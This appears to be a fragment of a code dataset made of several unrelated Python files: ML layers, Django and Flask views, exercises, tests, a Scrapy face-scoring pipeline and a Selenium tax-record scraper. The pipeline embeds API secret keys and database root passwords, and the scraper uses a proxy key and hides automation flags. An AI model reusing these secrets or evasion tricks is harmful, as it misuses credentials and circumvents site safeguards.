# input with bias\n if (np.shape(input_tensor)[1]) == (np.shape(self.weights)[0]):\n self.input = input_tensor\n if (np.shape(input_tensor)[1] +1) == (np.shape(self.weights)[0]):\n bias = np.ones((input_tensor.shape[0], 1))\n self.input = np.hstack((input_tensor, bias))\n\n out = np.dot(self.input, self.weights)\n return out\n\n def backward(self, error_tensor):\n # x_grad w/o bias\n weights_no_bias = self.weights[0:-1, :]\n error = np.dot(error_tensor, weights_no_bias.T)\n\n # w_grad\n self.grad_weights = np.dot(self.input.T, error_tensor)\n\n # update weights\n if self.optimizer is not None:\n self.weights = self.optimizer.calculate_update(self.weights, self.gradient_weights)\n\n return error\n\n def initialize(self, weights_initializer, bias_initializer):\n self.weights = weights_initializer.initialize( (self.input_size, self.output_size), self.input_size, self.output_size)\n self.bias = bias_initializer.initialize( (1, self.output_size), self.input_size, self.output_size )\n\n self.weights = np.vstack((self.weights, self.bias))\n","sub_path":"Exercise 3/Layers/FullyConnected.py","file_name":"FullyConnected.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507029081","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Testimonial, Portfolio, Contact\nfrom .forms import ContactForm\n\n\ndef index(request):\n title = ''\n if request.method == 'POST':\n form = ContactForm(request.POST or None, request.FILES or None)\n\n if form.is_valid():\n form.save()\n messages.success(request, f'I have got you message. 
I will get back to you as soon as possible.')\n return redirect('core:index')\n else:\n form = ContactForm()\n\n testimonials = Testimonial.objects.all().order_by('-id')\n portfolio = Portfolio.objects.all().order_by('-id')\n context = {\n 'title': title,\n 'testimonials': testimonials,\n 'portfolio': portfolio,\n 'form': form\n }\n return render(request, 'core/index.html', context)\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136001479","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\nimport random\nimport os\nfrom scrapy.exceptions import DropItem\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.http import Request\nfrom aip import AipFace\nimport base64\nimport mysql.connector\n\nAPP_ID = '17174146'\nAPI_KEY = 'MyKcGkviUKBQCpZGhOkFoX2L'\nSECRET_KEY = 'vtt8kak80lFhYRNtpBaq9jWmCvvgBRlo'\n\nAPP_ID1 = '17181482'\nAPI_KEY1 = 'rsS6060o13VBfZZ6fwATnHVH'\nSECRET_KEY1 = 'DtmNEpfirwfOrD42YSLtcRlZfX7pNwZe'\nclass WeiboPipeline(ImagesPipeline):\n def get_media_requests(self, item, info):\n url = item['image_urls']\n USER_AGENT_LIST = [\n 'MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23',\n 'Opera/9.20 (Macintosh; Intel Mac OS X; U; en)',\n 'Opera/9.0 (Macintosh; PPC Mac OS X; U; en)',\n 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',\n 'Mozilla/4.76 [en_jp] (X11; U; SunOS 5.8 sun4u)',\n 'iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0',\n 'Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)',\n 'Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)'\n ]\n # 随机生成user agent\n USER_AGENT = random.choice(USER_AGENT_LIST)\n headers = {\n 'Referer': \"http://www.umei.cc/\",\n 'User-Agent': USER_AGENT,\n }\n conn = mysql.connector.connect(host='127.0.0.1', user='root', password='root', database='bigdata')\n db = conn\n cursor = db.cursor()\n sql = \"SELECT * from pic where img_url = %s LIMIT 1\"\n val = (url,)\n cursor.execute(sql, val)\n myresult = cursor.fetchone()\n cursor.close()\n if myresult:\n return item\n else:\n yield Request(url, headers=headers)\n\n def item_completed(self, results, item, info):\n print(item)\n print('thisis pix')\n conn = mysql.connector.connect(host='127.0.0.1', user='root', password='root', database='bigdata')\n db = conn\n image_paths = [x['path'] for ok, x in results if ok] # ok判断是否下载成功\n if not image_paths:\n raise DropItem(\"Item contains no images\")\n # item['image_paths'] = image_paths\n else:\n print('dowok')\n for ok, x in results:\n path = x['path']\n rootpath = os.path.abspath('..')\n filePath = rootpath + \"\\\\images\\\\\"+path\n print(filePath)\n aipFace = AipFace(APP_ID, API_KEY, SECRET_KEY)\n imageType = \"BASE64\"\n options = {}\n options[\"face_field\"] = \"age,gender,beauty\"\n with open(filePath, 'rb') as fp:\n content = base64.b64encode(fp.read())\n base64ss = content.decode('utf-8')\n result = aipFace.detect(base64ss, imageType, options)\n beauty = 0\n if result['error_code'] == 0:\n face = result['result']['face_list']\n beauty = face[len(face)-1]['beauty']\n elif 
result['error_code']==18:\n aipFace1 = AipFace(APP_ID1, API_KEY1, SECRET_KEY1)\n result1 = aipFace1.detect(base64ss, imageType, options)\n if result1['error_code'] == 0:\n face = result1['result']['face_list']\n beauty = face[len(face) - 1]['beauty']\n img_url = item['image_urls']\n type = 1\n cursor = db.cursor()\n sql = \"INSERT INTO pic (img_url,`type`,beauty) VALUES (%s,%s,%s)\"\n val = (img_url,type,beauty)\n cursor.execute(sql, val)\n db.commit()\n cursor.close()\n print(\"1 条记录已插入, ID:\", cursor.lastrowid)\n\n return item\n\n def get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n content = base64.b64encode(fp.read())\n return content.decode('utf-8')\n\n\n\n\n","sub_path":"pachou/weibo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"108860486","text":"import math\n\nclass Solution:\n def maxSubArray(self, nums):\n if not nums:\n return 0\n\n max_so_far = -math.inf\n max_ending_here = 0\n\n for num in nums:\n max_ending_here = max(max_ending_here + num, num)\n max_so_far = max(max_ending_here, max_so_far)\n\n return max_so_far\n\n\nclass TestSolution:\n\n def __init__(self):\n self.solution = Solution()\n\n def test_no_nums(self):\n nums = []\n\n expected = 0\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_one_negative_num(self):\n nums = [-1]\n\n expected = -1\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_one_num(self):\n nums = [1]\n\n expected = 1\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_whole_array(self):\n nums = [1, 2, 3, 4, 5, 6]\n\n expected = 21\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_middle_of_array(self):\n nums = [-1, 2, 3, 4, 5, -6]\n\n expected = 14\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_small_negative_in_middle_of_array(self):\n nums = [-1, 2, 3, -1, 4, 5, -6]\n\n expected = 13\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_large_negative_in_middle_of_array(self):\n nums = [-1, 2, 3, -10, 4, 5, -6]\n\n expected = 9\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def run_test(self, test, test_name):\n print('Running {}...'.format(test_name))\n\n try:\n test()\n except:\n print('Failed {}'.format(test_name))\n else:\n print('Passed {}!'.format(test_name))\n\n def run_tests(self):\n self.run_test(self.test_no_nums, 'test_no_nums')\n self.run_test(self.test_one_negative_num, 'test_one_negative_num')\n self.run_test(self.test_one_num, 'test_one_num')\n self.run_test(self.test_whole_array, 'test_whole_array')\n self.run_test(self.test_middle_of_array, 'test_middle_of_array')\n self.run_test(self.test_small_negative_in_middle_of_array, 'test_small_negative_in_middle_of_array')\n self.run_test(self.test_large_negative_in_middle_of_array, 'test_large_negative_in_middle_of_array')\n\n\ntester = TestSolution()\ntester.run_tests()\n","sub_path":"53_maximum_subarray.py","file_name":"53_maximum_subarray.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629894420","text":"from flaskexample import app\nfrom flask import render_template\nfrom flask import request\nfrom functions import *\n\n@app.route('/')\ndef index():\n frontpage_articles = 
GetNYTHeadlines()\n\n    return render_template(\"index.html\", frontpage_articles = frontpage_articles)\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n\n    article_url = request.form['url']  # Parses URL input from index page\n\n    # Scrapes article text from website\n    en_title, ch_title, eng_text, ch_text = GetDualArticleText(article_url)\n\n    if en_title is None:\n        return 'Bad webpage!'\n\n    # Does analysis of vocab in article, and creates difficulty plot\n    vocab_df, difficulty_plot, ch_marked_para = ChTextAnalysis(ch_text)\n\n    # Sorts by HSK level\n    vocab_df.sort_values(by=['Level'], inplace=True)\n\n    # Turns values into integers, or \"N/A\" for NaNs (NaN != NaN, so x == x is\n    # True only for non-NaN values)\n    frequency = []\n    for x in vocab_df['Frequency'].values:\n        if x == x:\n            frequency.append(int(x))\n        else:\n            frequency.append('N/A')\n\n    level = []\n    for x in vocab_df['Level'].values:\n        if x == x:\n            level.append(int(x))\n        else:\n            level.append('N/A')\n\n    vocab_df['Frequency'] = frequency\n    vocab_df['Level'] = level\n\n    vocab_data = zip(vocab_df['Word'].values, vocab_df['Pinyin'].values, \\\n        vocab_df['Definitions'].values, vocab_df['Frequency'].values, \\\n        vocab_df['Level'].values, )\n\n    article_text = zip(eng_text, ch_marked_para)\n\n    return render_template(\"result.html\",\\\n        article_url=article_url, \\\n        article_text = article_text, \\\n        en_title = en_title, \\\n        ch_title = ch_title,\\\n        difficulty_plot = difficulty_plot,\\\n        vocab_data = vocab_data)","sub_path":"nyt_cn_analyzer/flaskexample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"189558213","text":"# -*- coding: utf-8 -*-\n\nimport os\n\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')\n\nimport django\n\ndjango.setup()\n\nfrom macro.models import MacroHead, MacroContents\nimport apps.macro.lib.wizmacro  # module providing read_macro, referenced below\n\n\ndef populate():\n    for head, contents in apps.macro.lib.wizmacro.read_macro('media/user.dat'):\n        macro_head = add_head(slot=head['slot'],\n                              name=head['name'],\n                              color=head['color'],\n                              description=head['description'])\n        for c in contents:\n            add_contents(macro=macro_head, contents=c)\n\n    for mh in MacroHead.objects.all():\n        for mc in MacroContents.objects.filter(macro=mh):\n            print(\"- {0} - {1}\".format(str(mh), str(mc)))\n\n\ndef add_head(slot, name, color, description):\n    h = MacroHead.objects.get_or_create(slot=slot)[0]\n    h.name = name\n    h.color = color\n    h.description = description\n    h.save()\n\n    return h\n\n\ndef add_contents(macro, contents):\n    c = MacroContents.objects.get_or_create(macro=macro, contents=contents)[0]\n\n    return c\n\n\nif __name__ == '__main__':\n    print(\"Starting to load test data into the Macro app\")\n    populate()","sub_path":"macronia/populate_macro.py","file_name":"populate_macro.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"518794892","text":"import sys\r\n\r\nfrom PyQt5 import QtWidgets\r\n\r\nimport mData\r\n\r\ndef main():\r\n    app = QtWidgets.QApplication(sys.argv)\r\n    window = mData.App()\r\n    window.show()\r\n    app.exec_()\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n    #mDB = mDataBase()\r\n    #query = \"UPDATE test SET testcol1 = 'tesqwasdfe564' WHERE idtest = 3 \"\r\n    #query = \"INSERT INTO test(testcol1) VALUES ('testasdq')\"\r\n    #rw = 
mDB.update(query)","sub_path":"0.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"533578514","text":"# The number that appears only once\r\n\r\na = [3, 3, 5, 4, 6, 5, 7, 4, 6, 8, 8, 9, 9, 0, 0]\r\n'''\r\nfor i in a:\r\n    if a.count(i) == 1:\r\n        print(i)\r\n        break\r\n    # runtime too long: count() makes this O(n^2)\r\n'''\r\n# every value except one appears exactly twice, so 2*sum(unique) - sum(all)\r\n# leaves exactly the value that appears once\r\naa = set(a)\r\nprint(sum(list(aa))*2-sum(a))\r\n\r\n","sub_path":"leetcode_singleNumber.py","file_name":"leetcode_singleNumber.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"87787029","text":"#! /opt/jython/bin/jython\n# -*- coding: utf-8 -*-\n#\n#\tjson_read.py\n#\n#\t\t\t\t\tOct/12/2016\n#\n#\nimport\tsys\nimport\tjson\n#\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n#\nsys.path.append ('/var/www/data_base/common/python_common')\nsys.path.append ('/var/www/data_base/common/jython_common')\nfrom jython_file_io import file_to_str_proc\nfrom text_manipulate import dict_display_proc\n# -------------------------------------------------------------\nsys.stderr.write (\"*** 開始 ***\\n\")\n#\nfile_in = sys.argv[1]\n#\njson_str = file_to_str_proc (file_in)\n#\ndict_aa = json.loads (json_str)\ndict_display_proc (dict_aa)\n#\nsys.stderr.write (\"*** 終了 ***\\n\")\n# -------------------------------------------------------------\n","sub_path":"json/jython/read/json_read.py","file_name":"json_read.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"18924277","text":"#encoding=utf-8\r\n\r\n#税务违法 大连市信息获取\r\n\r\nimport requests\r\nfrom selenium import webdriver\r\nimport time\r\nimport re\r\n\r\n\r\ndef getDriver():\r\n    headers = {\r\n        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4068.4 Safari/537.36'\r\n    }\r\n    url = 'http://17610040106.v4.dailiyun.com/query.txt?key=NP86444E99&word=&count=1&rand=false&ltime=0&norepeat=false&detail=false'\r\n    response = requests.get(url, headers=headers)\r\n    proxy_dly = response.text.strip()\r\n    options = webdriver.ChromeOptions()\r\n    if proxy_dly:\r\n        proxies = {\r\n            \"http\": \"http://\" + proxy_dly,\r\n            \"https\": \"http://\" + proxy_dly\r\n        }\r\n        options.add_argument('--proxy-server=' + proxies['https'])\r\n\r\n    options.add_argument(\"--disable-extensions\")  # 禁用扩展\r\n    options.add_argument(\"--disable-gpu\")  # 谷歌文档提到需要加上这个属性来规避bug\r\n    options.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n    options.add_argument('--headless')  # 无界面形式\r\n    options.add_argument('--no-sandbox')  # 取消沙盒模式\r\n    # options.add_argument('-kiosk')  # 全屏\r\n    # options.add_argument(\"--window-size=1920,900\")  # 指定浏览器分辨率\r\n    # options.set_window_size(480, 600)  # 窗口大小变化\r\n    options.add_argument('--disable-setuid-sandbox')\r\n    options.add_experimental_option(\"useAutomationExtension\", False)\r\n    options.add_argument('--incognito')  # 启动进入隐身模式\r\n    options.add_argument('--lang=zh-CN')  # 设置语言为简体中文\r\n    options.add_argument(\r\n        '--user-agent=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36')\r\n    options.add_argument('--hide-scrollbars')  # 隐藏滚动条, 应对一些特殊页面\r\n    options.add_argument('--disable-bundled-ppapi-flash')  # 禁用 Flash 的捆绑 PPAPI 版本\r\n    options.add_argument('--mute-audio')  # 将发送到音频设备的音频静音,使其在自动测试期间听不到\r\n\r\n    driver = webdriver.Chrome(executable_path='F:\\chromedriver.exe', options=options)\r\n    
driver.execute_cdp_cmd(\"Network.enable\", {})\r\n driver.execute_cdp_cmd(\"Network.setExtraHTTPHeaders\", {\"headers\": {\"User-Agent\": \"browserClientA\"}})\r\n driver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\r\n \"source\": \"\"\"\r\n Object.defineProperty(navigator, 'webdriver', {\r\n get: () => undefined\r\n })\r\n \"\"\"\r\n })\r\n\r\n return driver\r\n\r\ndef getInfo(i):\r\n url='http://dalian.chinatax.gov.cn/module/jslib/bulletin2/lpindex.html'\r\n driver=getDriver()\r\n driver.get(url)\r\n driver.switch_to.frame('top')\r\n #纳税人名称\r\n nsrmc='大连永多贸易有限公司'\r\n #nsrmc='北京字节跳动科技有限公司'\r\n driver.find_element_by_xpath('//*[@id=\"na_name\"]').send_keys(nsrmc)\r\n time.sleep(1)\r\n driver.find_element_by_xpath('//*[@id=\"form1\"]/button[1]').click()\r\n time.sleep(1)\r\n driver.switch_to.default_content()\r\n driver.switch_to.frame('right')\r\n\r\n result=driver.find_element_by_xpath('//*[@id=\"jpage\"]').get_attribute('innerHTML')\r\n if re.findall(r\"很遗憾,没有检索到任何记录!\",result):\r\n print('无符合公布标准的案件信息')\r\n driver.quit()\r\n exit(0)\r\n else:\r\n #print(re.sub(u\"\\\\<.*?\\\\>\",\"\",result))\r\n driver.find_element_by_xpath('//*[@id=\"jpage\"]/div/div/table/tbody/tr/td/table[2]/tbody/tr['+str(i)+']/td[1]/a').click()\r\n driver.switch_to.default_content()\r\n time.sleep(1)\r\n driver.switch_to.frame('right')\r\n info=driver.find_element_by_xpath('/html/body/div[2]/div/table/tbody').get_attribute('innerHTML')\r\n #print(info)\r\n info1=info\r\n info2 = re.sub(u\"\\\\\", \",\", info1)\r\n info3 = re.sub(u\"\\\\\", \"、\", info2)\r\n info4 = re.sub(u\"\\\\<.*?\\\\>\", \"\", info3)\r\n info5 = re.sub(u\"\\n\", \"\", info4)\r\n info6 = re.sub(u\"\\t\", \"\", info5)\r\n info7 = re.sub(u\"begin-->\", \"\", info6)\r\n info8 = re.sub(u\"end-->\", \"\", info7)\r\n info8 = re.sub(u\"\\\\<.*?\\\\>\", \",\", info8)\r\n info9 = info8.replace(' ', '').replace('、','').split(',')\r\n print(info9)\r\n\r\n driver.quit()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n for i in range(1,11):\r\n getInfo(i)\r\n except:\r\n exit(1)\r\n\r\n'''\r\n\r\n//*[@id=\"jpage\"]/div/div/table/tbody/tr/td/table[2]/tbody/tr[1]/td[1]/a\r\n//*[@id=\"jpage\"]/div/div/table/tbody/tr/td/table[2]/tbody/tr[2]/td[1]/a\r\n\r\n'''\r\n\r\n'''\r\n\r\n \r\n 检查机关\r\n\r\n \r\n 国家税务总局大连市税务局第一稽查局 \r\n \r\n \r\n 所属年度\r\n\r\n \r\n 2021年 \r\n \r\n \r\n 所属月份\r\n\r\n \r\n 5月 \r\n \r\n \r\n 纳税人或者法人或者其他组织或者自然人名称 \r\n 大连永多贸易有限公司 \r\n \r\n \r\n \r\n 组织机构代码 \r\n \r\n \r\n \r\n 注册地址 \r\n 辽宁省大连市中山区长江路29号12层1207-7 \r\n \r\n \r\n 法定代表人或负责人或经法院裁判确定的实际责任人 \r\n 杨猛 \r\n \r\n \r\n 法定代表人或者负责人性别 \r\n 男性 \r\n \r\n \r\n 法定代表人或者负责人证件名称 \r\n 身份证 \r\n \r\n \r\n 法定代表人或者负责人证件号码 \r\n 210726********1530 \r\n \r\n \r\n 经法院裁判负直接责任的财务人员姓名 \r\n \r\n\r\n \r\n 负有直接责任的财务负责人性别 \r\n \r\n\r\n \r\n 负有直接责任的财务负责人证件名称 \r\n \r\n\r\n \r\n 负有直接责任的财务负责人证件号码 \r\n \r\n\r\n \r\n 负有直接责任的中介机构信息及其从业人员信息 \r\n \r\n\r\n \r\n 案件性质 \r\n 走逃(失联) \r\n\r\n \r\n 主要违法事实 \r\n 经国家税务总局大连市税务局第一稽查局检查,发现其在2017年01月01日至2019年12月31日期间,主要存在以下问题:对外虚开普通发票125份,票面额累计959.79万元。经国家税务总局大连市税务局第一稽查局查证确认走逃(失联),已发布走逃(失联)纳税人公告。 \r\n\r\n \r\n 相关法律依据及税务处理处罚情况 \r\n 依照《中华人民共和国税收征收管理法》等相关法律法规的有关规定,依法移送公安机关。 \r\n\r\n\r\n\r\n'''","sub_path":"工作内容/税务/dalian.py","file_name":"dalian.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264599689","text":"# ---------------------- #\n# Author: Ben Davis #\n# File name: lab05.py #\n# Class: CSC 120 #\n# ---------------------- #\nimport random\n\n# 1 - Learn to Write Pseudocode - 
Find max value in a list\nprint(\"Lab Question #1\")\nlist1 = [1, 23, 454, 543, 2, 123]\nhigh_number = list1[0]\n\nfor x in list1:\n if x > high_number:\n high_number = x\nprint(high_number)\nprint()\n\n# 2 - Convert the following code into the function create_list()\n# import random\n# MAX_LEN = 50\n# my_list = []\n# for i in range(MAX_LEN):\n# my_list.append(random.randint(1, 99))\nprint(\"Lab Question #2\")\n\n\ndef create_list():\n MAX_LEN = 50\n my_list = []\n for num in range(MAX_LEN):\n my_list.append(random.randint(1, 99))\n print(my_list)\n return my_list\n\n\ncreate_list()\nprint()\n\n# 3 - Find the length of all the strings in the below list. Use a for or a while loop\nprint(\"Lab Question #3\")\nnames = [\"Jennifer\", \"Albatross\", \"Justin\", \"Dave\", \"Shankarnarayan\", \"Ezra\", \"Alice\", \"Kwabena\"]\ncount_list = []\n\nfor i in names:\n count_list.append(len(str(i)))\nprint(count_list)\nprint()\n\n# 4 - Write a program to find the count of all names that are <= than itself in the provided list.\n# Use two nested loops to get all points.\nprint(\"Lab Question #4\")\nnames2 = [\"Jennifer\", \"Albatross\", \"Justin\", \"Dave\", \"Shankarnarayan\", \"Ezra\", \"Alice\", \"Kwabena\"]\n\n\ndef for_short_names():\n shorter = []\n\n for k in names2:\n for k2 in names2:\n if len(k) > len(k2):\n shorter.append(k2)\n\n length = len(shorter)\n print(f\"The name {k} is longer than: {length}.\")\n\n if len(shorter) > 0:\n print(shorter)\n shorter = []\n print()\n\n\nfor_short_names()\n\n\n# 5 - Modify the above program to use two nested while loops\nprint(\"Lab Question #5\")\nnames3 = [\"Jennifer\", \"Albatross\", \"Justin\", \"Dave\", \"Shankarnarayan\", \"Ezra\", \"Alice\", \"Kwabena\"]\n\n\ndef while_short_names():\n shorter2 = []\n count = 0\n idx1 = 0\n\n while idx1 < len(names3):\n idx2 = 0\n while idx2 < len(names3):\n if len(names3[idx1]) >= len(names3[idx2]):\n if names3[idx1] != names3[idx2]:\n count += 1\n shorter2.append(names3[idx2])\n idx2 += 1\n else:\n idx2 += 1\n else:\n idx2 += 1\n print(f\"Names shorter than or equal to {names3[idx1]} are {count} names.\")\n print(shorter2)\n print()\n idx1 += 1\n shorter2 = []\n count = 0\n\n\nwhile_short_names()\n\n\n# 6 - Implement a leaderboard using a list. 
The leaderboard tracks the top 5 scores that have been posted.\n# If a higher score has been achieved, the leaderboard refreshes with the new top 5 scores.\nprint(\"Lab Question #6\")\n\n\ndef leaderboard():\n top_scores = []\n\n for i in range(50):\n rand_num = random.randint(0, 100)\n if len(top_scores) < 5:\n top_scores.append(rand_num)\n top_scores.sort()\n print(top_scores)\n\n elif rand_num > min(top_scores):\n top_scores.remove(min(top_scores))\n top_scores.append(rand_num)\n top_scores.sort()\n print(top_scores)\n\n print(top_scores)\n\n\nleaderboard()\nprint()\n\nprint(\"Lab Question #6 - Optional Refactor\")\nhi_scores = [99, 87, 89, 99, 65]\n\n\ndef leaderboard2(new_score):\n for v in hi_scores:\n if new_score > v:\n hi_scores.remove(v)\n hi_scores.append(new_score)\n break\n hi_scores.sort()\n print(hi_scores)\n\n\nleaderboard2(100)\nleaderboard2(98)\n","sub_path":"Lab 05/lab05.py","file_name":"lab05.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55037068","text":"import os\nimport torch\nimport random\nimport numpy as np\nimport argparse\nimport yaml, shutil\nfrom loader import get_loader\nfrom model import DRCN\nimport utils\nfrom utils.metrics import averageMeter, runningScore\nfrom utils.visualizer import Visualizer\nfrom configs.base_options import BaseOptions\n\nAccNames = ['OA', 'sImpervious_surfaces', 'Building', 'Low_vegetation', 'Tree', 'Car', 'Clutter']\n\n\ndef train(cfg, logger):\n # Setup seeds\n torch.manual_seed(cfg.get(\"seed\", 1337))\n torch.cuda.manual_seed(cfg.get(\"seed\", 1337))\n np.random.seed(cfg.get(\"seed\", 1337))\n random.seed(cfg.get(\"seed\", 1337))\n\n # Setup device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Setup Dataloader\n loader_train = get_loader(cfg, \"train\")\n loader_val = get_loader(cfg, \"val\")\n\n # Setup model\n model = DRCN(cfg).to(device)\n start_epoch = 1\n if cfg[\"training\"][\"resume\"] is not None:\n if os.path.isfile(cfg[\"training\"][\"resume\"]):\n print(\n \"Loading model and optimizer from checkpoint '{}'\".format(cfg[\"training\"][\"resume\"])\n )\n checkpoint = torch.load(cfg[\"training\"][\"resume\"])\n model.load_state_dict(checkpoint[\"model_state\"])\n start_epoch = checkpoint[\"epoch\"]\n del checkpoint\n\n else:\n print(\"No checkpoint found at '{}'\".format(cfg[\"training\"][\"resume\"]))\n\n # Setup Metrics and visualizer\n running_metrics_val = runningScore(cfg[\"data\"][\"n_classes\"])\n val_loss1_meter = averageMeter()\n val_loss2_meter = averageMeter()\n opt = BaseOptions()\n visualizer = Visualizer(opt)\n\n # Start training\n utils.mkdirs(cfg[\"training\"][\"checkpoint\"])\n\n best_iou = -100.0\n epoch = start_epoch\n train_epochs = cfg[\"training\"][\"epochs\"]\n iters_per_epoch = len(loader_train)\n while epoch < train_epochs:\n visualizer.reset()\n for iter, (images, labels) in enumerate(loader_train):\n model.set_input(images, labels)\n model.optimize_parameters()\n\n if iter % cfg[\"training\"][\"print_interval\"]==0 and iter!=0:\n print_info = \"Epoch:[{:2d}/{:2d}] Iter: [{:4d}/{:4d}] loss1: {:.5f} loss2: {:.5f} lr: {:.5f}\"\\\n .format(epoch, train_epochs, iter, iters_per_epoch, model.loss1.item(), model.loss2.item(), model.optimizer1.defaults['lr'])\n print(print_info)\n\n if iter % cfg[\"training\"][\"val_interval\"] == 0 and iter!=0:\n for images, labels in loader_val:\n model.set_input(images, labels)\n model.inference()\n preds = 
torch.argmax(model.out1, 1).cpu().numpy()\n labels = labels.data.numpy().squeeze()\n\n running_metrics_val.update(labels, preds)\n val_loss1_meter.update(model.loss1.item())\n val_loss2_meter.update(model.loss2.item())\n\n # visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n losses = {'loss1': val_loss1_meter.avg, '5loss2': val_loss2_meter.avg * 5}\n score, class_iou = running_metrics_val.get_scores()\n accs = []\n accs.append(score[\"Overall Acc: \\t\"])\n accs.extend(list(class_iou.values()))\n accs = dict(zip(AccNames, accs))\n tmp = iter/iters_per_epoch\n visualizer.plot_current_losses(epoch, tmp, losses)\n visualizer.plot_current_accuracy(epoch, tmp, accs)\n logger.info(\"Epoch:{:03d} val_loss1:{:.05f} val_loss2:{:.05f}\"\n .format(epoch, val_loss1_meter.avg, val_loss2_meter.avg))\n for k, v in score.items():\n print(k, v)\n logger.info(\"{}: {}\".format(k, v))\n\n for k, v in class_iou.items():\n print(\"{}: {}\".format(k, v))\n logger.info(\"{}: {}\".format(k, v))\n\n running_metrics_val.reset()\n\n if score[\"Mean IoU : \\t\"] >= best_iou:\n best_iou = score[\"Mean IoU : \\t\"]\n state = {\n \"epoch\": epoch,\n \"model_state\": model.state_dict(),\n \"optimizer1_state\": model.optimizer1.state_dict(),\n \"scheduler1_state\": model.scheduler1.state_dict(),\n \"optimizer2_state\": model.optimizer2.state_dict(),\n \"scheduler2_state\": model.scheduler2.state_dict(),\n \"best_iou\": best_iou,\n }\n save_path = os.path.join(\n cfg[\"training\"][\"checkpoint\"],\n \"{}_{}_best_model.pkl\".format(cfg[\"model\"][\"arch\"], cfg[\"data\"][\"dataset\"]),\n )\n torch.save(state, save_path)\n epoch += 1\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"config\")\n parser.add_argument(\n \"--config\",\n nargs=\"?\",\n type=str,\n default=\"configs/fcn8s_pascal.yml\",\n help=\"Configuration file to use\",\n )\n\n args = parser.parse_args()\n\n with open(args.config) as fp:\n cfg = yaml.load(fp, Loader=yaml.Loader)\n\n logdir = cfg[\"training\"][\"checkpoint\"]\n logger = utils.get_logger(logdir)\n shutil.copy(args.config, logdir)\n\n train(cfg, logger)\n","sub_path":"train_drcn.py","file_name":"train_drcn.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77457827","text":"import pytest\nimport pandas as pd\nimport numpy as np\n\nfrom mlserver.codecs.pandas import PandasCodec, _to_response_output\nfrom mlserver.types import (\n InferenceRequest,\n InferenceResponse,\n RequestInput,\n Parameters,\n ResponseOutput,\n)\n\n\n@pytest.mark.parametrize(\n \"series, expected\",\n [\n (\n pd.Series(data=[\"hey\", \"abc\"], name=\"foo\"),\n ResponseOutput(\n name=\"foo\", shape=[2], data=[\"hey\", \"abc\"], datatype=\"BYTES\"\n ),\n ),\n (\n pd.Series(data=[1, 2, 3], name=\"bar\"),\n ResponseOutput(name=\"bar\", shape=[3], data=[1, 2, 